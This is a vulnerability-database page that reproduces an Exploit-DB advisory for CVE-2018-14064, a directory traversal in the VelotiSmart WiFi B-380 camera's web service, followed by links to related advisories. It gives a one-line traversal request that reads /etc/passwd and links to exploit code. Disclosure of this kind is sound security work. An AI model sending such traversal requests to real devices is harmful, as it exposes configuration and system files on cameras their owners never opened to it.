Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMiguel Mendez ZEDB-ID:45030
HistoryJul 16, 2018 - 12:00 a.m.

VelotiSmart WiFi B-380 Camera - Directory Traversal

2018-07-1600:00:00
Miguel Mendez Z
www.exploit-db.com
38

AI Score

7.4

Confidence

Low

JSON
Title: Vulnerability in VelotiSmart Wifi - Directory Traversal
Date: 12-07-2018
Scope: Directory Traversal
Platforms: Unix
Author: Miguel Mendez Z
Vendor: VelotiSmart
Version: B380
CVE: CVE-2018–14064


Vulnerability description
-------------------------
- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device.

Vulnerable variable:
http://domain:80/../../etc/passwd

Exploit link:
https://github.com/s1kr10s/ExploitVelotiSmart

Poc:
https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac

Related

cvelist 1
nuclei 1
zdt 1
packetstorm 1
prion 1
cve 1
nvd 1
openvas 1
cvelist
cvelist
CVE-2018-14064
2018-07-15 15:00:00
nuclei
nuclei
VelotiSmart Wifi - Directory Traversal
2021-09-07 12:44:38
zdt
zdt
VelotiSmart WiFi B-380 Camera - Directory Traversal Vulnerability
2018-07-16 00:00:00
packetstorm
packetstorm
VelotiSmart WiFi B-380 Camera Directory Traversal
2018-07-16 00:00:00
prion
prion
Directory traversal
2018-07-15 15:29:00
cve
cve
CVE-2018-14064
2018-07-15 15:29:00
nvd
nvd
CVE-2018-14064
2018-07-15 15:29:00
openvas
openvas
Generic HTTP Directory Traversal (Web Root) - Active Check
2017-04-18 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:45030
cvelist1nuclei1zdt1packetstorm1prion1cve1nvd1openvas1